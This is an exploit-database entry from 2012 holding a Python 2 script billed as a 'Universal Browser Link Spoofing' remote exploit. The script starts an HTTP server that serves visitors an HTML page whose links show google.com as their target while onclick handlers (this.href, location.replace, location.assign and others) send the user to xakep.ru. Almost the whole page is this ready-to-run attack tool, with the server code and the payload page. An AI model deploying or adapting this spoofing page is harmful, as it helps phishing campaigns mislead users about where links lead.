Universal Browser Link Spoofing



EKU-ID: 2209 CVE: OSVDB-ID:
Author: S4(uR4 Published: 2012-05-31 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/env python

'''
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0                 I'm S4(uR4 member from r00tw0rm team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
'''

#
# Name      : Universal Browser Link Spoofing
# Date      : may, 30 2012
# Author    : S4(uR4
# Platform  : all
# Type      : remote exploit
# Web       : www.r00tw0rm.com
# Email     : satsura@r00tw0rm.com
# Credit and special thanx : iamjuza
# Tested on : Mozilla Firefox 12, Google Chrome 19, Internet Explorer 9.0, Opera 11.62, Safari 5.1.2
# Special thanks to :  r0073r, r4dc0re, Sid3^effects, L0rd CrusAd3r, KedAns-Dz, Angel Injection, gunslinger, JF, CrosS (1337day.com)
#                      Xenu, Versus71, alsa7r, mich4th3c0wb0y, FInnH@X, th3breacher, s3rver.exe (r00tw0rm.com)


import sys
import socket

from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

class RequestHandler(BaseHTTPRequestHandler):
    def get_exploit(self):
        exploit = '''
            <html><head><title>Remote Browser Link Spoofing Exploit(Webkit, Gecko, Presto, IE)</title></head><body bgcolor='#969696'>
            <h1>Spoofing Exploit (for all browsers engine : Webkit, Gecko, Presto, IE)</h1>
            <pre>------------------------------------------------</pre>
            Method this.href="         : <a href="http://www.google.com/" onclick="this.href='http://xakep.ru'">Click me!</a><br />
            Method location.reload=''  : <a href="http://www.google.com/" onclick="location.reload='http://www.xakep.ru'; return false;">Click me!</a><br />
            Method location.replace(''): <a href="http://www.google.com/" onclick="location.replace('http://www.xakep.ru'); return false;">Click me!</a><br />
            Methon location.assign('') : <a href="http://www.google.com/" onclick="location.assign('http://www.xakep.ru'); return false;">Click me!</a><br />
            <pre>------------------------------------------------</pre>
            Method window.location.assign('')  : <a href="http://www.google.com/" onclick="window.location.assign('http://www.xakep.ru'); return false;">Click me!</a><br />
            Method window.location.replace('') : <a href="http://www.google.com/" onclick="window.location.replace('http://www.xakep.ru'); return false;">Click me!</a><br />
            Method window.location.href=''     : <a href="http://www.google.com/" onclick="window.location.href='http://xakep.ru'; return false;">Click me!</a><br />
            <pre>------------------------------------------------</pre>
        </body>
    </html>
    '''
        return exploit

    def log_request(self, *args, **kwargs):
        pass
       
    def do_GET(self):
        try:
            if self.path == '/':
                print
                print '[-] Incoming connection from %s' % self.client_address[0]
                self.send_response(200)
                self.send_header('Content-Type', 'text/html')
                self.end_headers()
                print '[+] Sending exploit to %s ...' % self.client_address[0]
                self.wfile.write(self.get_exploit())
                print '[+] Exploit sent to %s' % self.client_address[0]
        except:
            print '[-] Error : an error has occured while serving the HTTP request'
            exit_program()
           
def exit_program():
    print '[+] Exiting ...'
    sys.exit(0)
                      
def main():
    if len(sys.argv) != 2:
        print 'Usage: %s [any port between 0 and 65535]' % sys.argv[0]
        sys.exit(0)
    try:
        port = int(sys.argv[1])
        if port < 0 or port > 65535:
            raise ValueError
        try:
            serv = HTTPServer(('', port), RequestHandler)
            ip = socket.gethostbyname(socket.gethostname())
            print '[+] Server is running at http://%s:%d/' % (ip, port)
            try:
                serv.serve_forever()
            except:
                exit_program()
        except socket.error:
            print '[-] Error : a socket error has occurred'
            exit_program()   
    except ValueError:
        print '[-] Error : an invalid port number was given'
        exit_program()
           
if __name__ == '__main__':
    main()